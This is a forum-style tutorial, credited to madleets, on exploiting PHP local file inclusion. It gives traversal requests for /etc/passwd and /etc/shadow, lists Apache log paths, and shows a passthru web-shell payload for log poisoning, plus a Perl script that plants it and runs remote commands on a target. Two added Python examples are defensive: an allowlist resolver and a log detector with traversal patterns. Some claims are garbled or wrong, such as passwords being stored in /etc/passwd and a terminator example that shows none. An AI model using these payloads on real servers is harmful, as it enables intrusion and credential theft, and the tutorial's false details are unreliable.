Aerosol

LFI vulnerability exploitation

In this tutorial you'll learn how to exploit a vulnerable LFI site.

First of all, let's have a look at this small PHP code:

PHP Code:

<?php
$page = $_GET['page'];
include($page);
?>

This code should never be used, because it is vulnerable to LFI: the $page variable is not sanitized.

We take advantage of this vulnerability with this request:

site.host/index.php?page=../../../../../../../etc/passwd

If the site is hosted on Unix, user passwords are stored in /etc/passwd, and the above request shows the passwords and usernames.

Now all you have to do is to decode the password.

An encrypted password should look like:

username:x:503:100:fullname:/home/username:/bin/sh

In this example, the password is x; as another example of the password:

username:!:503:100:fullname:/home/username:/bin/sh

Other "places" where you can find passwords besides /etc/passwd:

/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits

If the browser shows that the include appends .php to the name (so that /etc/passwd.php does not exist), add a terminator at the end of the path so that the server skips everything written after it:

site.host/index.php?file=../../../../../../../../etc/passwd
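As an added example (mine, not code from the post or from its madleets source), here is a Python model of the check the vulnerable include($page) snippet is missing. It covers both the plain traversal request above and the appended-.php case: the requested name is matched against an allowlist, the suffix is added server-side, and the resolved path is confirmed to lie inside the template directory. The allowlist, the temporary template directory and the sample requests are constructed for the demonstration.

```python
import os
import tempfile
from typing import Dict, Optional

# Constructed allowlist: the only page names the application will include.
ALLOWED_PAGES = frozenset({"home", "about", "contact"})


def resolve_page(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of the template to include, or None if the
    request must be rejected.  This is the check include($page) lacks:
      1. reject control characters (a NUL byte cuts the name short in
         C-based runtimes, defeating a suffix the server appends),
      2. accept only names from the allowlist,
      3. append the .php suffix server-side and confirm the real path is
         still inside base_dir and points at an existing file.
    """
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in requested):
        return None
    if requested not in ALLOWED_PAGES:
        return None
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, requested + ".php"))
    # realpath collapses '..' segments, so a name that escaped base_dir no
    # longer starts with base_dir + separator.
    if not candidate.startswith(base_real + os.sep):
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def is_traversal_attempt(requested: str) -> bool:
    """Cheap alerting signal: substrings a legitimate page name never
    carries (dot-dot, separators, NUL and their percent-encoded forms)."""
    lowered = requested.lower()
    markers = ("../", "..\\", "%2e%2e", "%2f", "%5c", "\x00", "%00", "/etc/")
    return any(m in lowered for m in markers)


def demo() -> Dict[str, bool]:
    """Create three constructed templates in a temporary directory and run
    the resolver over sample requests, including the traversal payload from
    the post.  Returns {request: accepted?}."""
    samples = [
        "home",
        "../../../../../../../etc/passwd",
        "../../../../../../../etc/passwd\x00",
        "%2e%2e/%2e%2e/etc/passwd",
        "about/../home",
        "admin",  # a plausible name that is simply not allowlisted
    ]
    with tempfile.TemporaryDirectory() as base:
        for name in ALLOWED_PAGES:
            with open(os.path.join(base, name + ".php"), "w") as fh:
                fh.write("<?php /* constructed template */ ?>\n")
        return {s: resolve_page(base, s) is not None for s in samples}


if __name__ == "__main__":
    for request, accepted in demo().items():
        flag = " (traversal markers)" if is_traversal_attempt(request) else ""
        print(f"{request!r:45} -> {'include' if accepted else 'REJECT'}{flag}")
```

The allowlist does the real work; the realpath containment and the file-existence check are defence in depth, so that a mistake in the allowlist (a name containing a separator, a symlinked template directory) still cannot reach a file outside base_dir.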

We can run commands on the server by injecting PHP code into the log files and then including them.

Some log locations:

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/access_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log

OK, now let's look at the log that records pages that do not exist, and the following code: <? passthru(\$_GET[cmd]) ?>. If we write in the browser:

site.host/<? passthru(\$_GET[cmd]) ?>

we will obviously get a page saying that this file does not exist on the server, because the browser automatically URL-encodes the request, and the page we reached is translated by the browser to:

site.host/<? passthru(\$_GET[cmd]) ?>

So you have to do something else... We use the following Perl script:

#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site = "victim.com";
$path = "/folder/";
$code = "<? passthru(\$_GET[cmd]) ?>";
$log  = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
print $socket "User-Agent: " . $code . "\r\n";
print $socket "Host: " . $site . "\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code successfully injected in $log\n";

print "\nType command to run or exit to end: ";
$cmd = <STDIN>;

while ($cmd !~ "exit") {

    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
    print $socket "GET " . $path . "index.php?file=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";

    while ($show = <$socket>) {
        print $show;
    }

    print "Type command to run or exit to end: ";
    $cmd = <STDIN>;
}
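As an added example from the defender's side (mine, not part of the post or of the madleets script), here is the detection logic a Python script would run over Apache access-log lines to catch the two stages just described: traversal reads of the files listed above, and PHP tags planted in the request line or User-Agent followed by an include of a log file with a cmd parameter. The log lines, timestamps and addresses are constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format.  203.0.113.0/24 is a
# documentation address range; the requests mirror the post's two stages.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /folder/<? passthru($_GET[cmd]) ?> HTTP/1.1" 404 209 "-" "<? passthru($_GET[cmd]) ?>"
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?file=../../../../../../../etc/httpd/logs/error_log&cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:58:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
SENSITIVE_RE = re.compile(
    r'/etc/(passwd|shadow|group|security/)|/logs?/(access|error)[_.]log', re.I
)
PHP_TAG_RE = re.compile(r'<\?(php\b|=|\s)', re.I)   # "<?php", "<?=", "<? "
CMD_PARAM_RE = re.compile(r'[?&]cmd=', re.I)


def decode(value: str) -> str:
    """Percent-decode up to twice so double-encoded ..%252f.. is seen too."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line and tag it with zero or more findings."""
    m = LINE_RE.match(line)
    if not m:
        return None
    request = decode(m.group("request"))
    ua = decode(m.group("ua"))
    findings: List[str] = []
    if TRAVERSAL_RE.search(request):
        findings.append("path-traversal")
    if SENSITIVE_RE.search(request):
        findings.append("sensitive-file-read")
    # A PHP tag in either field is a poisoning attempt: it lands in the log
    # verbatim and executes if that log is later passed to include().
    if PHP_TAG_RE.search(request) or PHP_TAG_RE.search(ua):
        findings.append("log-poisoning-payload")
    if CMD_PARAM_RE.search(request) and TRAVERSAL_RE.search(request):
        findings.append("poisoned-log-include")
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "findings": findings}


def analyze_log(text: str) -> List[Dict[str, object]]:
    """Return only the parsed lines that carry at least one finding."""
    rows = (analyze_line(l) for l in text.splitlines() if l.strip())
    return [r for r in rows if r and r["findings"]]


def poisoning_chains(text: str) -> List[str]:
    """IPs that both planted a PHP payload in the log and later included a
    log file with a cmd parameter: the full sequence the post walks through."""
    seen: Dict[object, set] = {}
    for r in analyze_log(text):
        seen.setdefault(r["ip"], set()).update(r["findings"])
    return sorted(str(ip) for ip, f in seen.items()
                  if {"log-poisoning-payload", "poisoned-log-include"} <= f)


if __name__ == "__main__":
    for row in analyze_log(SAMPLE_LOG):
        print(row["ip"], row["ts"], row["status"], ", ".join(row["findings"]))
    print("log poisoning chains:", poisoning_chains(SAMPLE_LOG))
```

The 404 on the poisoning request is the tell: the payload request never needs to succeed, it only needs to be logged, so a rule that ignores failed requests misses the first stage entirely. Correlating per source address across both stages gives a far better signal than either pattern alone.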

Source: madleets
